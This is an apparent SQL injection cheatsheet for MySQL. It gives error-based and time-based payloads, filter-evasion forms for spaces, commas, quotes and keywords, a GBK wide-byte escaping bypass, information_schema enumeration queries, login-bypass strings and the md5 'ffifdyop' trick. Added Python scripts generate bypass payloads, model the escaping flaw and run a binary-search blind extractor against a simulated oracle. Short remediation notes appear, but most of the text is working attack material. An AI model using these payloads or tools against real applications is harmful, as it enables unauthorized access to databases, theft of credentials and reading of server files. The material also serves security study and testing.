SQL injection cheatsheet
Injection techniques
Error Based
and (select 1 from (select count(*),concat((inject here),floor(rand(0)*2))x from information_schema.tables group by x)a) /* duplicate-key error; the source table needs at least 3 rows */
and 1=(updatexml(1,concat(0x5e24,(inject here),0x5e24),1)) /* XPath error; the leaked text is truncated to 32 characters */
and extractvalue(1, concat(0x5c, (inject here))) /* same 32-character limit, so extract with SUBSTR() in slices */
Time Based Blind
sleep(3) /* delay only when the tested condition holds, then compare response times */
benchmark(10000000, sha1('true')) /* CPU-bound delay for when sleep() is filtered */
Filter bypasses
Spaces filtered
- inline comment in place of a space
/**/
- line comment followed by a newline in place of a space (see the sqlmap tamper space2mysqldash)
- other characters that the MySQL lexer treats as whitespace
%20 %09 %0a %0b %0c %0d %a0
- wrap terms in parentheses so no space is needed
()
Commas (,) filtered
Bypass with JOIN (each derived table contributes one column):
UNION SELECT 1,2,3,4 FROM ...
UNION SELECT * FROM ((SELECT 1)A JOIN (SELECT 2)B JOIN (SELECT 3)C JOIN (SELECT 4)D)
Quotes (string literals) filtered
- hexadecimal literal (compared as a string in string context)
SELECT 0x61646D696E;
- CHAR() function (needs commas, so it does not help when commas are filtered too)
SELECT CHAR(97, 100, 109, 105, 110);
Blacklisted strings
- adjacent literals (MySQL concatenates them)
SELECT 'a' 'd' 'mi' 'n';
- CONCAT
SELECT CONCAT('a', 'd', 'm', 'i', 'n');
- CONCAT_WS
SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
Keywords filtered
- double writing (selselectect survives a filter that strips each keyword once)
- random case (SeLeCt), when the filter is case-sensitive
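The encoders below are an added example, not part of the original cheatsheet: they generate the bypass forms listed in this section (hex and CHAR() literals, split strings, the comma-free JOIN UNION, space substitutes, double writing and random case) and include a naive one-pass keyword-stripping filter to check the double-writing trick against. All function names are my own; the filter model is an assumption about how a simple WAF rule behaves.

```python
import random
import re

# Added example (not from the original cheatsheet): payload encoders for the
# filter bypasses above, plus a naive filter model to test them against.


def hex_literal(s: str) -> str:
    """'admin' -> 0x61646D696E ; MySQL treats the hex literal as a string in string context."""
    return "0x" + s.encode("utf-8").hex().upper()


def char_literal(s: str) -> str:
    """'admin' -> CHAR(97, 100, 109, 105, 110). Needs commas, so useless if commas are filtered."""
    return "CHAR(" + ", ".join(str(b) for b in s.encode("utf-8")) + ")"


def adjacent_literals(s: str) -> str:
    """'admin' -> 'a' 'd' 'm' 'i' 'n' ; MySQL concatenates adjacent string literals."""
    return " ".join("'" + c.replace("'", "\\'") + "'" for c in s)


def concat_split(s: str, ws: bool = False) -> str:
    """Split a blacklisted word into one-character literals joined by CONCAT or CONCAT_WS."""
    pieces = ", ".join("'" + c.replace("'", "\\'") + "'" for c in s)
    return f"CONCAT_WS('', {pieces})" if ws else f"CONCAT({pieces})"


def no_comma_union(n: int) -> str:
    """UNION SELECT 1,2,...,n rewritten without commas: one derived table per column, JOINed."""
    parts = [f"(SELECT {i + 1}){chr(ord('A') + i)}" for i in range(n)]
    return "UNION SELECT * FROM (" + " JOIN ".join(parts) + ")"


def no_space(payload: str, style: str = "comment") -> str:
    """Replace spaces with an inline comment, a line comment + newline (space2mysqldash), or a tab."""
    sep = {"comment": "/**/", "dash": "--\n", "tab": "\t", "newline": "\n"}[style]
    return payload.replace(" ", sep)


def double_write(payload: str, keywords) -> str:
    """'select' -> 'selselectect': after one keyword-stripping pass, 'select' is left behind."""
    for kw in keywords:
        half = len(kw) // 2
        payload = re.sub(
            re.escape(kw),
            lambda m: m.group(0)[:half] + m.group(0) + m.group(0)[half:],
            payload,
            flags=re.IGNORECASE,
        )
    return payload


def random_case(payload: str, seed: int = 0) -> str:
    """Randomise letter case; defeats filters that match keywords case-sensitively."""
    rng = random.Random(seed)
    return "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in payload)


def naive_filter(payload: str, keywords) -> str:
    """Assumed WAF model: one pass that deletes every listed keyword, case-sensitively."""
    for kw in keywords:
        payload = payload.replace(kw, "")
    return payload


if __name__ == "__main__":
    kws = ["select", "union"]
    doubled = double_write("union select", kws)
    print(doubled, "->", naive_filter(doubled, kws))
    print(no_space(no_comma_union(4)))
    print(hex_literal("admin"), char_literal("admin"), concat_split("admin", ws=True))
```

The double-writing trick only works against a filter that removes each keyword in a single pass; a filter that loops until nothing changes strips the doubled form too, which is why the random-case and comment-based variants are usually tried first.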
Bypassing escaping
addslashes
Returns a string with backslashes added before characters that need to be escaped. These characters are:
- single quote (') -> \'
- double quote (") -> \"
- backslash (\) -> \\
- NUL (the NUL byte) -> \0
Wide-byte injection: with a multi-byte connection charset such as GBK, a high byte like %df followed by the %5c that addslashes inserts is parsed as one two-byte character, so the quote that follows is no longer escaped (%df%27 -> %df%5c%27 -> one GBK character followed by a bare ')
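The following is an added example, not code from the original cheatsheet: a byte-level model of PHP's addslashes() and of how the MySQL lexer would see the escaped literal once the query bytes are decoded under the connection charset. The attacker input is constructed, and the decoding with errors="replace" is my stand-in for the lexer skipping an invalid multi-byte sequence.

```python
# Added example (not from the original cheatsheet): why addslashes() fails
# when the connection charset is multi-byte (GBK) but the escaping is byte-based.


def addslashes(data: bytes) -> bytes:
    """Byte-level model of PHP addslashes(): prefix ' \" \\ with a backslash, NUL -> \\0."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):          # ' " \
            out += b"\\" + bytes([b])
        elif b == 0x00:
            out += b"\\0"
        else:
            out.append(b)
    return bytes(out)


def server_view(escaped: bytes, charset: str) -> str:
    """What the lexer sees after decoding the literal under the connection charset.
    errors='replace' is an assumption standing in for 'invalid sequence is skipped'."""
    return escaped.decode(charset, errors="replace")


def quote_still_escaped(literal: str) -> bool:
    """True when every single quote in the decoded literal is preceded by a backslash."""
    return all(i > 0 and literal[i - 1] == "\\"
               for i, c in enumerate(literal) if c == "'")


# Constructed attacker input: a high lead byte, then the quote, then the injected clause.
ATTACK = b"\xdf' OR 1=1#"


def injection_succeeds(charset: str) -> bool:
    """Does the quote survive unescaped (i.e. does the injection work) under this charset?"""
    literal = server_view(addslashes(ATTACK), charset)
    return not quote_still_escaped(literal)


if __name__ == "__main__":
    print("escaped bytes:", addslashes(ATTACK))
    for cs in ("gbk", "utf-8", "latin-1"):
        print(f"{cs:8} lexer sees {server_view(addslashes(ATTACK), cs)!r}"
              f" -> injection {'works' if injection_succeeds(cs) else 'blocked'}")
```

Under GBK the pair 0xDF 0x5C is consumed as a single character, so the following quote terminates the string and the rest of the input is parsed as SQL; under a single-byte charset, or UTF-8 (where 0xDF 0x5C is simply invalid), the backslash still protects the quote. addslashes is the wrong tool either way: escape with mysqli_real_escape_string after setting the connection charset with mysqli_set_charset, or better, use prepared statements.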
Format-string injection (queries assembled with sprintf/printf after escaping)
Useful variables and functions
user()
database()
version()
@@datadir /* system variable, no parentheses */
concat()
group_concat()
hex() unhex()
load_file()
SELECT ... INTO OUTFILE '' /* needs the FILE privilege and a path permitted by secure_file_priv */
Where things live (information_schema)
Table names
- raw
SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database();
- union
UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* tables in every database without quotes or database(): base tables report VERSION=10 in MySQL 5.x, information_schema views report NULL */
UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database(); /* tables in the current database */
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql'; /* tables in all user-defined databases */
- blind
AND (SELECT SUBSTR(table_name,1,1) FROM information_schema.tables WHERE table_schema=database() LIMIT 1) > 'A'
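As an added example that is not part of the original cheatsheet, the script below drives the comparison oracle above to recover the first table name character by character with a binary search over printable ASCII. The oracle is simulated locally over a constructed table list; in a real test the same function would send the payload and report whether the page changed. I added BINARY to the payload as an assumption: under a case-insensitive collation, > 'a' and > 'A' are the same test and the search would return the wrong case.

```python
# Added example (not from the original cheatsheet): boolean-blind extraction of
# a table name by binary search over SUBSTR(table_name,i,1) > 'x'.

SAMPLE_TABLES = ["flag", "users"]   # constructed: what information_schema.tables would hold


def blind_payload(pos: int, probe: str) -> str:
    """The injected condition for position pos. BINARY forces a byte-wise comparison."""
    return ("1 AND (SELECT BINARY SUBSTR(table_name,%d,1) FROM information_schema.tables "
            "WHERE table_schema=database() LIMIT 1) > '%s'" % (pos, probe))


def simulated_oracle(pos: int, probe: str, tables=SAMPLE_TABLES) -> bool:
    """Evaluates blind_payload(pos, probe) locally. SUBSTR past the end of the
    string yields '', and '' > anything is false, which is how the end is detected."""
    ch = tables[0][pos - 1:pos]
    return ch > probe


def extract_char(pos: int, oracle):
    """Binary search for the smallest c with NOT (ch > c); that c is the character itself."""
    if not oracle(pos, ""):            # '' > '' is false; any real character is > ''
        return None
    lo, hi = 0x20, 0x7E                # printable ASCII
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, chr(mid)):      # ch > chr(mid): the answer lies in (mid, hi]
            lo = mid + 1
        else:                          # ch <= chr(mid): the answer lies in [lo, mid]
            hi = mid
    return chr(lo)


def extract_string(oracle, max_len: int = 64) -> str:
    out = []
    for pos in range(1, max_len + 1):
        ch = extract_char(pos, oracle)
        if ch is None:
            break
        out.append(ch)
    return "".join(out)


def count_queries(oracle):
    """Run the extraction and return (result, number of oracle queries it needed)."""
    calls = 0

    def counting(pos, probe):
        nonlocal calls
        calls += 1
        return oracle(pos, probe)

    return extract_string(counting), calls


if __name__ == "__main__":
    print(blind_payload(1, "A"))
    name, n = count_queries(simulated_oracle)
    print(f"recovered {name!r} in {n} queries")
```

Each character costs one end-of-string check plus about seven comparisons, so a name of length n takes roughly 8n requests instead of 95n for a linear scan; ORD(SUBSTR(...)) > 64 is the equivalent form when quotes are filtered.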
Column names
SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
Other
Universal password (login bypass)
'=0#
SELECT * FROM user WHERE username=''=0#';
/* parsed as (username='')=0: for any non-empty username the inner comparison is 0, 0=0 is true, and # comments out the rest */
PHP
Exploiting md5($password, true) in PHP
"SELECT * FROM user WHERE username='admin' and password='" . md5($password, true) . "'"
password: ffifdyop
The raw (binary) md5 of ffifdyop starts with the bytes 'or'6, so the query becomes ... password=''or'6<garbage>', and MySQL evaluates the string '6<garbage>' in boolean context as the number 6, which is true.
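The script below is an added example and not code from the original cheatsheet: it computes the raw digest of ffifdyop, splices it into the query the way PHP does (byte for byte, hence the latin-1 decode), and models how MySQL turns the trailing string literal into a number. The numeric-prefix rule is my model of MySQL's string-to-number coercion; the query shape and column names are taken from the cheatsheet.

```python
import hashlib
import re

# Added example (not from the original cheatsheet): why md5($password, true)
# with the password ffifdyop turns "... password='<raw md5>'" into a true WHERE clause.


def raw_md5_as_php_string(password: str) -> str:
    """md5($password, true) returns 16 raw bytes that PHP pastes into the query unchanged;
    decoding as latin-1 keeps exactly one character per byte."""
    return hashlib.md5(password.encode("utf-8")).digest().decode("latin-1")


def build_query(password: str) -> str:
    return ("SELECT * FROM user WHERE username='admin' and password='"
            + raw_md5_as_php_string(password) + "'")


def mysql_string_to_number(s: str) -> float:
    """Model of MySQL coercion in numeric/boolean context: the leading numeric prefix, else 0."""
    m = re.match(r"\s*[-+]?(\d+(\.\d*)?|\.\d+)([eE][-+]?\d+)?", s)
    return float(m.group(0)) if m else 0.0


def where_clause_is_true(password: str) -> bool:
    """Does the injected hash rewrite the clause to ... password=''or'<rest>' with a truthy rest?"""
    h = raw_md5_as_php_string(password)
    if not h.startswith("'or'"):
        return False                       # no quote break: plain comparison against the hash
    rest = h[4:]                           # becomes the literal '<rest>' in the OR branch
    if "'" in rest or "\\" in rest:
        return False                       # would break the statement's syntax instead
    return mysql_string_to_number(rest) != 0


if __name__ == "__main__":
    digest = raw_md5_as_php_string("ffifdyop")
    print(digest.encode("latin-1").hex())
    print(build_query("ffifdyop"))
    print("clause true:", where_clause_is_true("ffifdyop"))
```

Hex-encoding the digest (md5($password) without the second argument) removes the problem because the output is then limited to [0-9a-f]; the real fix is a prepared statement plus a proper password hash rather than MD5 in any form.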